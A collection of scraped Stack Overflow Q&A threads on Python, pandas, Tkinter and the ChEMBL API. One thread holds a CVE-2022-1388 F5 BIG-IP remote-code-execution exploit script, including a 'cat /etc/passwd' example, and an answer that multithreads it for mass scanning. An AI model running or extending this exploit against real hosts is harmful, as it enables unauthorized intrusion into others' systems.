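    {'username': 'userone', 'user_email': 'userone@gmail.com', 'displayname': 'User One'},
    {'username': 'usertwo', 'user_email': 'usertwo@gmail.com', 'displayname': 'User Two'},
]

for item in users:
    obj = print_values(**item)  # keys must match the parameter names
    obj.printing_content()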
How to Construct Method and Attributes using Dictionaries in Python
class print_values: def __init__(self,username,user_email,displayname): self.name= username self.email=user_email self.DisplayName=displayname def printing_content(self): print(f"UserName: {self.name}\n" f"UserEmail: {self.email}\n" f"UserDisplayName:{self.DisplayName}\n") user_one={'username':'userone', 'useremail':'userone@gmail.com', 'displayname':'User One'} user_two={'username':'usertwo', 'useremail':'usertwo@gmail.com', 'displayname':'User Two'} user_three={'username':'userthree', 'useremail':'userthree@gmail.com', 'displayname':'User Three'} users_list=['user_one','user_two','user_three'] obj_name=print_values(user_one['username'],user_one['useremail'],user_one['displayname']) obj_name.printing_content() It's working fine, as am getting output as below UserName: userone UserEmail: userone@gmail.com UserDisplayName:User One Here am only using user_one dict, i want to do the same for multiple dict. I have tried adding the dict names in list and try to loop through them, like below for item in user_list: obj_name=print_values(item['username'],item['useremail'],item['displayname']) obj_name.printing_content() But am getting below error obj_name=print_values(item['username'],item['useremail'],item['displayname']) TypeError: string indices must be integers Any one do let me know what am i missing or anyother idea to get this done. Thanks in advance!
[ "This is because in users_list=['user_one', 'user_two', 'user_three'] you enter the variable name as a string.\nclass print_values:\n def __init__(self,username,user_email,displayname):\n self.name= username\n self.email=user_email\n self.DisplayName=displayname\n def printing_content(self):\n print(f\"UserName: {self.name}\\n\"\n f\"UserEmail: {self.email}\\n\"\n f\"UserDisplayName:{self.DisplayName}\\n\")\n\nuser_one={'username':'userone',\n 'useremail':'userone@gmail.com',\n 'displayname':'User One'}\n\nuser_two={'username':'usertwo',\n 'useremail':'usertwo@gmail.com',\n 'displayname':'User Two'}\n\nuser_three={'username':'userthree',\n 'useremail':'userthree@gmail.com',\n 'displayname':'User Three'}\n\nusers_list=[user_one,user_two,user_three] # edited\n\n\nobj_name=print_values(user_one['username'],user_one['useremail'],user_one['displayname'])\n\nobj_name.printing_content()\n\n\nfor item in users_list:\n obj_name=print_values(item['username'],item['useremail'],item['displayname'])\n obj_name.printing_content()\n\n\nExplanation\nYour users_list=['user_one', 'user_two', 'user_three'] is a string containing the variable names as the string. When you loop on user_list\nfor item in user_list:\n\nHere item is not the user_one, or user_two as a variable but these are as the string means 'user_one', or 'user_two', so when you try to get values like item['username'], here you got the error because the item is not a dictionary or json or ..., but it is a string here, you can get the only provide an integer inside these brackets [], like 1, 2, 3, 4,..., ∞.\nI hope you understand well. Thanks.\n\nDon't make a dictionary for every user.\nUse this code\nclass Users:\n\n def __init__(self) -> None:\n self.userList = []\n\n def addUser(self, user):\n self.userList.append(user)\n\n\n\n\nclass User:\n\n def __init__(self, username, email, name) -> None:\n self.username = username\n self.email = email\n self.name = name\n\n def __str__(self) -> str:\n return f\"Username = {self.username}\\nEmail = {self.email}\\nName = {self.name}\\n\"\n \n\nusers = Users()\n\n\nusers.addUser(User(\"username1\", \"email1\", \"name1\"))\nusers.addUser(User(\"username2\", \"email2\", \"name2\"))\n\n\n\n# First way of printing\nfor user in users.userList:\n print(user) # Printing user directly prints the formatted output\n # Because I have changed the magic `__str__` method in user class\n # You can return anything('string data type only') in __str__ it will print when you print the class object.\n# Second way of printing.\n\nfor user in users.userList:\n print(\"Username = \" + user.username)\n print(\"Email = \" + user.email)\n print(\"Name = \" + user.name)\n print() # for adding one extra line\n\n\n" ]
[ 1 ]
[]
[]
[ "dictionary", "list", "loops", "python", "python_3.x" ]
stackoverflow_0074592665_dictionary_list_loops_python_python_3.x.txt
Q: Python crashes without errors My Python code crashes without raising any exceptions. The code uses Tkinter, socket programming, pyvisa, threads, and other modules. It is an automated sensor calibration system written in Python. The code runs on a Windows 10 machine with Python version 2.7.16. It is not crashing at a fixed point; the crash is random. 6/10 times the code completes the process; the rest of the time it crashes without an error. When I run it under the python trace module, it succeeds 10/10 times. When I convert this code into an executable file using auto-py-to-exe, the number of crashes goes down. Now the problem is I need to find the cause of the issue and then export this code as an executable file. Can someone guide me on how to figure out the issue? Also, I run the trace from the command line; is there a way to include this trace in the script so that when I convert the code to an executable I can check whether it is crashing?
A: Maybe you forgot to add tkinter.mainloop() at the end of your code, because tkinter.mainloop() tells Python to run the Tkinter event loop. This method listens for events, such as button clicks or keypresses.
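On the follow-up question of enabling tracing from inside the script: the standard-library faulthandler module dumps a traceback when the interpreter dies hard instead of exiting silently (built in since Python 3.3; for Python 2.7 a backport of the same name is available on PyPI). A minimal sketch; the log filename is illustrative:

import faulthandler

# Write a traceback for every thread if the interpreter crashes hard
# (segfault, abort) instead of dying silently.
crash_log = open("crash_trace.log", "w")
faulthandler.enable(file=crash_log, all_threads=True)

The trace module can also be driven programmatically, e.g. trace.Trace(trace=True, count=False).runfunc(main), though faulthandler is the better fit for silent hard crashes.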
Python crashes without errors
My Python code crashes without raising any exceptions. The code uses Tkinter, socket programming, pyvisa, threads, and other modules. It is an automated sensor calibration system written in Python. The code runs on a Windows 10 machine with Python version 2.7.16. It is not crashing at a fixed point; the crash is random. 6/10 times the code completes the process; the rest of the time it crashes without an error. When I run it under the python trace module, it succeeds 10/10 times. When I convert this code into an executable file using auto-py-to-exe, the number of crashes goes down. Now the problem is I need to find the cause of the issue and then export this code as an executable file. Can someone guide me on how to figure out the issue? Also, I run the trace from the command line; is there a way to include this trace in the script so that when I convert the code to an executable I can check whether it is crashing?
[ "maybe you forgot to add tkinter.mainloop() at the end of your code, cause tkinter.mainloop() tells Python to run the Tkinter event loop. This method listens for events, such as button clicks or keypresses\n" ]
[ 0 ]
[ "Have you tried the --debug option when using auto-py-to-exe?\nSee the blog post about tool usage, especially the debug section\nhttps://nitratine.net/blog/post/issues-when-using-auto-py-to-exe/?utm_source=auto_py_to_exe&utm_medium=readme_link&utm_campaign=auto_py_to_exe_help\n" ]
[ -1 ]
[ "crash", "python", "trace" ]
stackoverflow_0062421601_crash_python_trace.txt
Q: How can I convert an object to float? [screenshots of the code and the dataframe omitted] I tried making a boxplot for 'horsepower', but it shows up as an object type, so I tried converting it to float, but that raises an error (shown in the screenshot). A: The column horsepower seems to hold some non-numeric values. In this case I suggest using pandas.to_numeric instead of pandas.Series.astype. Replace this:
df_T['horsepower']= df_T['horsepower'].astype(float)
with this:
df_T['horsepower']= pd.to_numeric(df_T['horsepower'], errors='coerce')
With errors='coerce', invalid parsing will be set as NaN.
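Before coercing, it can help to see which values are actually non-numeric; in datasets like the classic auto-mpg data the culprit is often a placeholder string such as '?'. A minimal sketch, assuming the dataframe name df_T from the answer:

import pandas as pd

# Rows where conversion fails become NaN, which exposes the bad values.
mask = pd.to_numeric(df_T['horsepower'], errors='coerce').isna()
print(df_T.loc[mask, 'horsepower'].unique())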
How can I convert an object to float?
[screenshots of the code and the dataframe omitted] I tried making a boxplot for 'horsepower', but it shows up as an object type, so I tried converting it to float, but that raises an error (shown in the screenshot).
[ "The column horsepower seems to hold some non numeric values. I suggest you, in this case, to use pandas.to_numeric instead of pandas.Series.astype.\nReplace this :\ndf_T['horsepower']= df_T['horsepower'].astype(float)\n\nBy this :\ndf_T['horsepower']= pd.to_numeric(df_T['horsepower'], errors= 'coerce')\n\n\nIf ‘coerce’, then invalid parsing will be set as NaN.\n\n" ]
[ 0 ]
[]
[]
[ "dataframe", "object", "pandas", "python", "type_conversion" ]
stackoverflow_0074592693_dataframe_object_pandas_python_type_conversion.txt
Q: How to add multiprocessing into my script I wrote a pentest script, but I don't know how to add multiprocessing to it. Can somebody help me?
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-


def usage():
    print("Eg: \n python3 CVE-2022-1388.py -u https://127.0.0.1")
    print(" python3 CVE-2022-1388.py -u httts://127.0.0.1 -c 'cat /etc/passwd'")
    print(" python3 CVE-2022-1388.py -f urls.txt")


def poc(target):
    url = requests.utils.urlparse(target).scheme + "://" + requests.utils.urlparse(target).netloc
    payload = {"command": "run", "utilCmdArgs": "-c id"}
    try:
        res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
        if (res.status_code == 200) and ('uid=0(root) gid=0(root) groups=0(root)' in res.text):
            print("[+] {} is vulnerable!!!".format(url))
            return True
        else:
            print("[-] {} is not vulnerable.".format(url))
            return False
    except Exception as e:
        print("[-] {} Exception: ".format(url) + e)
        pass


def exp(target, command):
    url = requests.utils.urlparse(target).scheme + "://" + requests.utils.urlparse(target).netloc
    payload = {"command": "run", "utilCmdArgs": "-c '{}'".format(command)}
    try:
        res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
        if (res.status_code == 200) and ("tm:util:bash:runstate" in res.text):
            print(res.json()['commandResult'])
            return True
        else:
            print("[-] {} is not vulnerable.".format(url))
            return False
    except Exception as e:
        print("[-] {} Exception: ".format(url) + e)
        pass


if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE")
    parser.add_argument('-u', '--url', type=str,
                        help="vulnerability verification for individual websites")
    parser.add_argument('-c', '--command', type=str, help="command execution")
    parser.add_argument('-f', '--file', type=str,
                        help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
    args = parser.parse_args()
    if len(sys.argv) == 3:
        if sys.argv[1] in ['-u', '--url']:
            poc(args.url)
        elif sys.argv[1] in ['-f', '--file']:
            if os.path.isfile(args.file) == True:
                with open(args.file) as target:
                    urls = []
                    urls = target.read().splitlines()
                    for url in urls:
                        if poc(url) == True:
                            with open("success.txt", "a+") as f:
                                f.write(url + "\n")
    elif len(sys.argv) == 5:
        if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']):
            exp(args.url, args.command)
    else:
        parser.print_help()
        usage()

I can't imagine how to do this.
A: It appears that you are doing network requests and writing to a file. For this, multithreading should be suitable. You need the following import:
from multiprocessing.dummy import Pool
If you wish to use multiprocessing instead, then:
from multiprocessing import Pool
It would appear that the only place where you have multiple jobs to run is for the --file option:
    ... # Previous lines omitted
    if len(sys.argv) == 3:
        if sys.argv[1] in ['-u', '--url']:
            poc(args.url)
        elif sys.argv[1] in ['-f', '--file']:
            if os.path.isfile(args.file) == True:
                with open(args.file) as target:
                    ######## Start of Modified Code ###########
                    """
                    urls = [] # This is unnecessary
                    """
                    urls = target.read().splitlines()
                    pool = Pool(len(urls))
                    # Open file just once. Use flag "a" if you
                    # really want to append to an existing file:
                    with open("success.txt", "w") as f:
                        for idx, result in enumerate(pool.imap(poc, urls)):
                            if result:
                                f.write(urls[idx] + "\n")
                    ######## End of Modified Code ###########
    elif len(sys.argv) == 5:
        if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']):
            exp(args.url, args.command)
    else:
        parser.print_help()
        usage()
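For completeness, the standard-library concurrent.futures module offers the same fan-out pattern without touching multiprocessing at all. A minimal sketch, assuming poc and the urls list are defined as in the question:

from concurrent.futures import ThreadPoolExecutor

# Threads suit this workload because each task waits on the network,
# not the CPU.
with ThreadPoolExecutor(max_workers=20) as executor:
    results = list(executor.map(poc, urls))

with open("success.txt", "w") as f:
    for url, ok in zip(urls, results):
        if ok:
            f.write(url + "\n")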
How to add multiprocessing into my script
I wrote a pentest script, but I don't know how to add multiprocessing to it. Can somebody help me?
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-


def usage():
    print("Eg: \n python3 CVE-2022-1388.py -u https://127.0.0.1")
    print(" python3 CVE-2022-1388.py -u httts://127.0.0.1 -c 'cat /etc/passwd'")
    print(" python3 CVE-2022-1388.py -f urls.txt")


def poc(target):
    url = requests.utils.urlparse(target).scheme + "://" + requests.utils.urlparse(target).netloc
    payload = {"command": "run", "utilCmdArgs": "-c id"}
    try:
        res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
        if (res.status_code == 200) and ('uid=0(root) gid=0(root) groups=0(root)' in res.text):
            print("[+] {} is vulnerable!!!".format(url))
            return True
        else:
            print("[-] {} is not vulnerable.".format(url))
            return False
    except Exception as e:
        print("[-] {} Exception: ".format(url) + e)
        pass


def exp(target, command):
    url = requests.utils.urlparse(target).scheme + "://" + requests.utils.urlparse(target).netloc
    payload = {"command": "run", "utilCmdArgs": "-c '{}'".format(command)}
    try:
        res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
        if (res.status_code == 200) and ("tm:util:bash:runstate" in res.text):
            print(res.json()['commandResult'])
            return True
        else:
            print("[-] {} is not vulnerable.".format(url))
            return False
    except Exception as e:
        print("[-] {} Exception: ".format(url) + e)
        pass


if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE")
    parser.add_argument('-u', '--url', type=str,
                        help="vulnerability verification for individual websites")
    parser.add_argument('-c', '--command', type=str, help="command execution")
    parser.add_argument('-f', '--file', type=str,
                        help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
    args = parser.parse_args()
    if len(sys.argv) == 3:
        if sys.argv[1] in ['-u', '--url']:
            poc(args.url)
        elif sys.argv[1] in ['-f', '--file']:
            if os.path.isfile(args.file) == True:
                with open(args.file) as target:
                    urls = []
                    urls = target.read().splitlines()
                    for url in urls:
                        if poc(url) == True:
                            with open("success.txt", "a+") as f:
                                f.write(url + "\n")
    elif len(sys.argv) == 5:
        if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']):
            exp(args.url, args.command)
    else:
        parser.print_help()
        usage()

I can't imagine how to do this.
[ "It appears that you are doing network requests and writing to a file. For this multithreading should be suitable. You need the following import:\nfrom multiprocessing.dummy import Pool\n\nIf you wish to use multiprocessing instead, then:\nfrom multiprocessing import Pool\n\nIt would appear that the only place where you have multiple jobs to run is for the --file option:\n ... # Previous lines omitted\n if len(sys.argv) == 3:\n if sys.argv[1] in ['-u', '--url']:\n poc(args.url)\n elif sys.argv[1] in ['-f', '--file']:\n if os.path.isfile(args.file) == True:\n with open(args.file) as target:\n ######## Start of Modified Code ###########\n \"\"\"\n urls = [] # This is unnecessary\n \"\"\"\n urls = target.read().splitlines()\n pool = Pool(len(urls))\n # Open file just once. Use flag \"a\" if you\n # really want to append to an existing file:\n with open(\"success.txt\", \"w\") as f:\n for idx, result in enumerate(pool.imap(poc, urls)):\n if result:\n f.write(urls[idx] + \"\\n\")\n ######## End of Modified Code ###########\n elif len(sys.argv) == 5:\n if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']):\n exp(args.url, args.command)\n else:\n parser.print_help()\n usage()\n\n" ]
[ 0 ]
[]
[]
[ "multiprocessing", "multithreading", "python" ]
stackoverflow_0074564993_multiprocessing_multithreading_python.txt
Q: Process files then modify filenames I am processing files in a directory, and after processing a file I want to save it under the original name but with xx added to the file name. My purpose is to identify which files have been processed. Basic suggestions on how to proceed are appreciated. A: If the only purpose is to flag the file so you know which files have been processed, I would try another strategy (adding file metadata or something similar). But from your question, I infer that the only thing you need is to rename the file after it has been processed... You can use os.rename:
import os

filename = "example.txt"
flag_suffix = ".xx"


with open(filename, "wb+") as f:
    # process file
    ...

os.rename(filename, f"{filename}{flag_suffix}")
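A pathlib variant of the same idea, for readers who prefer it; the ".xx" marker matches the question and the path is illustrative:

from pathlib import Path

path = Path("example.txt")
# ... process the file ...

# example.txt -> example.txt.xx, marking the file as processed
path.rename(path.with_name(path.name + ".xx"))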
Process files then modify filenames
I am processing files in a directory and after processing a file I want to save it using the original name but also add xx to the file name. My purpose is to identify which files have been processed. Basic suggestions as to how to proceed are appreciated
[ "If the only purpose is flag the file in order to know which files have been processed I would try another strategy (adding file metadata or something). But from your question, I infer the only thing you need is a rename of the file after being processed... You can use os.rename:\nimport os\n\nfilename = \"example.txt\"\nflag_suffix = \".xx\"\n\n\nwith open(filename, \"wb+\") as f:\n # process file\n ...\n\nos.rename(filename, f\"{filename}{flag_suffix}\")\n\n" ]
[ 1 ]
[]
[]
[ "python" ]
stackoverflow_0074592573_python.txt
Q: i was asked to plot a sinus function in Python. Instead of using np.sin we are supposed to import a file called mdt the code on the file looks like this: import numpy as np import math from scipy.fftpack import fft import matplotlib.pyplot as plt from matplotlib.animation import FuncAnimation sd_found = False try: import sounddevice as sd sd_found = True except: print('Das Modul "sounddevice" fehlt. Es lässt sich per "pip install sounddevice" im "Anaconda Prompt" installieren.') def playSound(sound, fs): sd.play(sound/10, fs) def spectrum(Messwerte, Abtastrate): N=len(Messwerte) u_cmplx=fft(Messwerte) u_abs=np.abs(u_cmplx[0:N//2])/N u_abs[1:] *= 2 f=np.linspace(0,Abtastrate//2,N//2) return (f,u_abs) def dataRead(**kwargs): argListMust = {'amplitude', 'samplingRate', 'duration', 'channels', 'resolution', 'outType'} argList = {'amplitude', 'samplingRate', 'duration', 'channels', 'resolution', 'outType', 'continues'} for key in kwargs: if key not in argList: print('Folgende Argumente müssen übergeben werden: amplitude=[V], samplingRate=[Hz], duration=[s], channels=[[,]], resolution=[bits], outType=\'volt\' oder \'codes\')') return None for key in argListMust: if key not in kwargs: print('Folgende Argumente müssen übergeben werden: amplitude=[V], samplingRate=[Hz], duration=[s], channels=[[,]], resolution=[bits], outType=\'volt\' oder \'codes\')') return None amplitude = kwargs['amplitude'] samplingRate = kwargs['samplingRate'] duration = kwargs['duration'] channels = kwargs['channels'] resolution = kwargs['resolution'] outType = kwargs['outType'] if 'continues' not in kwargs.keys(): continues = False else: continues = kwargs['continues'] if type(continues) != bool: print('continues muss vom Typ bool sein') return None if not all(i < 4 for i in channels): print('Mögliche Kanäle sind 0 bis 4') return None if len(channels) > len(set(channels)): print('Kanäle dürfen nicht doppelt auftauchen') return None outtType = outType.capitalize() if outtType != 'Volt' and outtType != 'Codes': print(outtType) print('outType = \'Volt\' oder \'Codes\'') return None u_lsb = 2*amplitude/(2**resolution-1) bins = [-amplitude+u_lsb/2+u_lsb*i for i in range(2**resolution-1)] ai_voltage_rngs = [1,2,5,10] if amplitude not in ai_voltage_rngs: print('Unterstützt werden folgende Amplituden:') print(ai_voltage_rngs) return None for channel in channels: if resolution < 1 or resolution > 14: print(f'Die Auflösung muss zwischen 1 und 14 Bit liegen') return None if samplingRate > 48000: print(f'Mit dieser Kanalanzahl beträgt die höchste Abtastrate 48000 Hz:') return None if continues: print('Die Liveansicht ist nicht verfügbar.') else: t = np.arange(0,duration,1/samplingRate) data = np.zeros( (len(channels),t.size)) data[0,:] = 2.5*np.sin(2*np.pi*50*t+np.random.rand()*np.pi*2) data[data>amplitude] = amplitude data[data<-amplitude] = -amplitude data = np.digitize(data,bins) if outtType == 'Volt': data = data*u_lsb-amplitude print(f"Die Messung wurde durchgeführt mit einer virtuellen Messkarte \n Messbereich: +/-{amplitude:1.2f} Volt\n samplingRate: {samplingRate:1.1f} Hz\n Messdauer: {duration:1.3f} s\n Auflösung: {resolution:d} bit\n Ausgabe in: {outtType:s}") return data my code looks like this and when i plot i get a blank figure: import numpy as np import matplotlib.pyplot as plt import mdt data = mdt.dataRead(amplitude = 5,samplingRate = 48,duration = 10,channels = [0],resolution = 14,outType = 'Volt',continues=False) z = np.linspace(0,0.02,80) plt.plot(data) A: I figured it out. 
I will leave the correct code for this task below; if you're interested, check it out.
import numpy as np
import matplotlib.pyplot as plt 
import mdt
data = mdt.dataRead(**{'amplitude': 5,'samplingRate':48000,'duration':0.2,'channels':[0],'resolution':14,'outType':'volt'})
data1 = data[0]
np.save('messung.npy',data1)
Mess=np.load('messung.npy')
y = Mess[100:550]
t = np.linspace(0,0.02,Mess.shape[0])
t_1 = t[100:550]
plt.figure(1)
plt.subplot(2,1,1)
plt.plot(t,Mess)
plt.xlabel("Zeit(s)")
plt.ylabel("Spannung(V)")
plt.title("Messung der Karte")

plt.subplot(2,1,2)
plt.plot(t_1,y,'red')
plt.xlabel("Zeit(s)")
plt.ylabel("Spannung(V)")
plt.title("Ausschnitt der Messung")
plt.tight_layout()

(The stray "=read=" alias in the original assignment has been dropped, and the first subplot's time axis is now labelled in seconds to match the second one, since both plot the same t array.)

This was originally added as revision 5 of the question.
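As an additional note on why the original plt.plot(data) call looked blank: dataRead returns a 2-D array of shape (channels, samples), and Matplotlib treats each column of a 2-D input as its own series, so it tries to draw thousands of one-point lines. Plotting one channel against a matching time axis avoids this; a minimal sketch, assuming data came from the dataRead call above:

import numpy as np
import matplotlib.pyplot as plt

t = np.arange(0, 0.2, 1 / 48000)  # matches duration=0.2 s at 48000 Hz
plt.plot(t, data[0])              # first (and only) channel
plt.show()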
I was asked to plot a sine function in Python. Instead of using np.sin we are supposed to import a file called mdt
the code on the file looks like this: import numpy as np import math from scipy.fftpack import fft import matplotlib.pyplot as plt from matplotlib.animation import FuncAnimation sd_found = False try: import sounddevice as sd sd_found = True except: print('Das Modul "sounddevice" fehlt. Es lässt sich per "pip install sounddevice" im "Anaconda Prompt" installieren.') def playSound(sound, fs): sd.play(sound/10, fs) def spectrum(Messwerte, Abtastrate): N=len(Messwerte) u_cmplx=fft(Messwerte) u_abs=np.abs(u_cmplx[0:N//2])/N u_abs[1:] *= 2 f=np.linspace(0,Abtastrate//2,N//2) return (f,u_abs) def dataRead(**kwargs): argListMust = {'amplitude', 'samplingRate', 'duration', 'channels', 'resolution', 'outType'} argList = {'amplitude', 'samplingRate', 'duration', 'channels', 'resolution', 'outType', 'continues'} for key in kwargs: if key not in argList: print('Folgende Argumente müssen übergeben werden: amplitude=[V], samplingRate=[Hz], duration=[s], channels=[[,]], resolution=[bits], outType=\'volt\' oder \'codes\')') return None for key in argListMust: if key not in kwargs: print('Folgende Argumente müssen übergeben werden: amplitude=[V], samplingRate=[Hz], duration=[s], channels=[[,]], resolution=[bits], outType=\'volt\' oder \'codes\')') return None amplitude = kwargs['amplitude'] samplingRate = kwargs['samplingRate'] duration = kwargs['duration'] channels = kwargs['channels'] resolution = kwargs['resolution'] outType = kwargs['outType'] if 'continues' not in kwargs.keys(): continues = False else: continues = kwargs['continues'] if type(continues) != bool: print('continues muss vom Typ bool sein') return None if not all(i < 4 for i in channels): print('Mögliche Kanäle sind 0 bis 4') return None if len(channels) > len(set(channels)): print('Kanäle dürfen nicht doppelt auftauchen') return None outtType = outType.capitalize() if outtType != 'Volt' and outtType != 'Codes': print(outtType) print('outType = \'Volt\' oder \'Codes\'') return None u_lsb = 2*amplitude/(2**resolution-1) bins = [-amplitude+u_lsb/2+u_lsb*i for i in range(2**resolution-1)] ai_voltage_rngs = [1,2,5,10] if amplitude not in ai_voltage_rngs: print('Unterstützt werden folgende Amplituden:') print(ai_voltage_rngs) return None for channel in channels: if resolution < 1 or resolution > 14: print(f'Die Auflösung muss zwischen 1 und 14 Bit liegen') return None if samplingRate > 48000: print(f'Mit dieser Kanalanzahl beträgt die höchste Abtastrate 48000 Hz:') return None if continues: print('Die Liveansicht ist nicht verfügbar.') else: t = np.arange(0,duration,1/samplingRate) data = np.zeros( (len(channels),t.size)) data[0,:] = 2.5*np.sin(2*np.pi*50*t+np.random.rand()*np.pi*2) data[data>amplitude] = amplitude data[data<-amplitude] = -amplitude data = np.digitize(data,bins) if outtType == 'Volt': data = data*u_lsb-amplitude print(f"Die Messung wurde durchgeführt mit einer virtuellen Messkarte \n Messbereich: +/-{amplitude:1.2f} Volt\n samplingRate: {samplingRate:1.1f} Hz\n Messdauer: {duration:1.3f} s\n Auflösung: {resolution:d} bit\n Ausgabe in: {outtType:s}") return data my code looks like this and when i plot i get a blank figure: import numpy as np import matplotlib.pyplot as plt import mdt data = mdt.dataRead(amplitude = 5,samplingRate = 48,duration = 10,channels = [0],resolution = 14,outType = 'Volt',continues=False) z = np.linspace(0,0.02,80) plt.plot(data)
[ "I figured it out. I will leave the correct code to this task below if interested check it out.\nimport numpy as np\nimport matplotlib.pyplot as plt \nimport mdt\ndata =read=mdt.dataRead(**{'amplitude': 5,'samplingRate':48000,'duration':0.2,'channels':[0],'resolution':14,'outType':'volt'})\ndata1 = data[0]\nnp.save('messung.npy',data1)\nMess=np.load('messung.npy')\ny = Mess[100:550]\nt = np.linspace(0,0.02,Mess.shape[0])\nt_1 = t[100:550]\nplt.figure(1)\nplt.subplot(2,1,1)\nplt.plot(t,Mess)\nplt.xlabel(\"Zeit(ms)\")\nplt.ylabel(\"Spannung(V)\")\nplt.title(\"Messung der Karte\")\n\nplt.subplot(2,1,2)\nplt.plot(t_1,y,'red')\nplt.xlabel(\"Zeit(s)\")\nplt.ylabel(\"Spannung(V)\")\nplt.title(\"Ausschnitt der Messung\")\nplt.tight_layout()\n\n\nThis was originally added as revision 5 of the question.\n" ]
[ 0 ]
[]
[]
[ "matplotlib", "numpy", "python" ]
stackoverflow_0074586925_matplotlib_numpy_python.txt
Q: How to use the ChEMBL API to download the chembldescriptors? I have a .csv with Molecule ChEMBL IDs, and I can't find the code to download the chembldescriptors of that set of molecules. Specifically, I want to download: 'TPSA', 'NumHAcceptors', 'NumHDonors', 'CX Acidic pKa', 'CX Basic pKa', 'qed'. A: the starting point is not a .csv, but I can get all the information through the API (for python) from chembl_webresource_client.new_client import new_client import pandas as pd #activity API: activities = new_client.activity.filter(target_chembl_id__in = ['CHEMBL1824'] #erbB-2 ).filter(standard_type = "IC50" , IC50_value__lte = 10000 , assay_type = 'B' #Only look for Binding Assays ).only(['molecule_chembl_id', 'ic50_value']) act_df = pd.DataFrame(activities) #find the list of compounds that are within the act_df dataframe: cmpd_chembl_ids = list(set(act_df['molecule_chembl_id'])) #molecule API molecules = new_client.molecule.filter(molecule_chembl_id__in = cmpd_chembl_ids ).only([ 'molecule_chembl_id', 'molecule_properties']) mol_df = pd.DataFrame(molecules) #mol_df # Convert nested cells (ie those containing a dictionary) to individual columns in the dataframe mol_df['qed_weighted'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['qed_weighted']) #mol_df['cx_logd'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['cx_logd']) #mol_df['cx_logp'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['cx_logp']) mol_df['cx_most_apka'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['cx_most_apka']) mol_df['cx_most_bpka'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['cx_most_bpka']) mol_df['hba'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['hba']) mol_df['hbd'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['hbd']) mol_df['psa'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['psa'])
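Bridging back to the question's starting point (a .csv of IDs): one hedged way to feed the file into the molecule endpoint used above. The filename and column header here are assumptions; adjust them to your .csv:

import pandas as pd
from chembl_webresource_client.new_client import new_client

# Hypothetical file and column names.
ids = pd.read_csv("molecules.csv")["Molecule ChEMBL ID"].dropna().tolist()

molecules = new_client.molecule.filter(molecule_chembl_id__in = ids
                                       ).only(['molecule_chembl_id', 'molecule_properties'])
mol_df = pd.DataFrame(molecules)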
How to use the ChEMBL API to download the ChEMBL descriptors?
I have a .csv with Molecule ChEMBL IDs, and I can't find the code to download the ChEMBL descriptors for that set of molecules. Specifically, I want to download: 'TPSA', 'NumHAcceptors', 'NumHDonors', 'CX Acidic pKa', 'CX Basic pKa', 'qed'.
[ "the starting point is not a .csv, but I can get all the information through the API (for python)\nfrom chembl_webresource_client.new_client import new_client\nimport pandas as pd\n#activity API:\nactivities = new_client.activity.filter(target_chembl_id__in = ['CHEMBL1824'] #erbB-2\n ).filter(standard_type = \"IC50\"\n , IC50_value__lte = 10000 \n , assay_type = 'B' #Only look for Binding Assays\n ).only(['molecule_chembl_id', 'ic50_value'])\nact_df = pd.DataFrame(activities)\n#find the list of compounds that are within the act_df dataframe:\ncmpd_chembl_ids = list(set(act_df['molecule_chembl_id']))\n#molecule API\nmolecules = new_client.molecule.filter(molecule_chembl_id__in = cmpd_chembl_ids \n ).only([ 'molecule_chembl_id', 'molecule_properties'])\nmol_df = pd.DataFrame(molecules)\n#mol_df\n# Convert nested cells (ie those containing a dictionary) to individual columns in the dataframe\nmol_df['qed_weighted'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['qed_weighted'])\n#mol_df['cx_logd'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['cx_logd'])\n#mol_df['cx_logp'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['cx_logp'])\nmol_df['cx_most_apka'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['cx_most_apka'])\nmol_df['cx_most_bpka'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['cx_most_bpka'])\nmol_df['hba'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['hba'])\nmol_df['hbd'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['hbd'])\nmol_df['psa'] = mol_df.loc[ mol_df['molecule_properties'].notnull(), 'molecule_properties'].apply(lambda x: x['psa'])\n\n" ]
[ 0 ]
[]
[]
[ "api", "cheminformatics", "python" ]
stackoverflow_0074562889_api_cheminformatics_python.txt
